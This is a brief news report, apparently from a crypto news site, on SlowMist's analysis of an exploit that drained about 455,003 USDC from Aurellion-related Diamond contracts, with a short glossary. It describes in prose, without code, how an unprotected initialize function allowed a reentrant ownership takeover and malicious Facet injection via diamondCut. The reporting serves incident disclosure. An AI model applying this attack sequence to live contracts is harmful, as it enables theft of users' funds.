Aurellion Exploit Drains About 455,003 USDC Through Diamond Contract Flaw

According to SlowMist, an unprotected initialize(address) function in Aurellion Labs-related Diamond contracts enabled a reentrant ownership takeover, malicious Facet injection, and the theft of about 455,003 USDC.

USDC

46d ago

Summary

Aurellion suffered an exploit that drained about 455,003 USDC. According to SlowMist, the attacker abused an unprotected initialize(address) function in the SafeOwnable Facet, used reentrant initialization to change ownership of the Diamond contract, and then called diamondCut to add a malicious Facet with pullERC20 functionality. That contract-level access enabled the attacker to move USDC, showing how weak initialization protections in modular smart contract systems can lead to ownership compromise and fund theft.

Terms & Concepts

Diamond contract: A modular smart contract architecture that separates logic into multiple Facets, allowing upgrades and feature changes without replacing the core contract.
Facet: A contract module in Diamond architecture that provides specific functions and can be added, replaced, or removed through upgrades.
diamondCut: A Diamond-standard function used to modify Facets in a contract; if abused after an ownership takeover, it can inject malicious logic.